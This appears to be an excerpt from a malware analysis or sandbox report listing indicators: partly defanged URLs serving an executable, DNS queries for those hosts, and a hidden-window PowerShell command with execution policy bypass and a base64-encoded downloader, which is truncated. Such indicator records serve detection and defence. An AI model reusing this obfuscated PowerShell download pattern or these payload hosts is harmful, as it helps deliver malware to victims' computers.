Technical Information
- http://dh##mhn.com/zcfrnd1.exe
- http://dh##mhn.com/zcfrnd1.exe
- http://dh##mhn.com/
- http://ww#.#hm-mhn.com/
- DNS ASK dh##mhn.com
- DNS ASK ww#.#hm-mhn.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " powerSHELL.eXE -EX bYpasS -nOp -W hiDdeN -ec IABzAGUAdAAtAEMAbwBuAHQAZQBOAHQAIAAtAHYAQQBMAFUAZQAgACgAbgBlAHcALQBPAGIASgBlAGMAdAAgAFMAeQBzAFQARQBNAC4ATgBFAHQALgB3AGUAYgBDAGwASQBlAE4AVAApAC4ARA...' (with hidden window)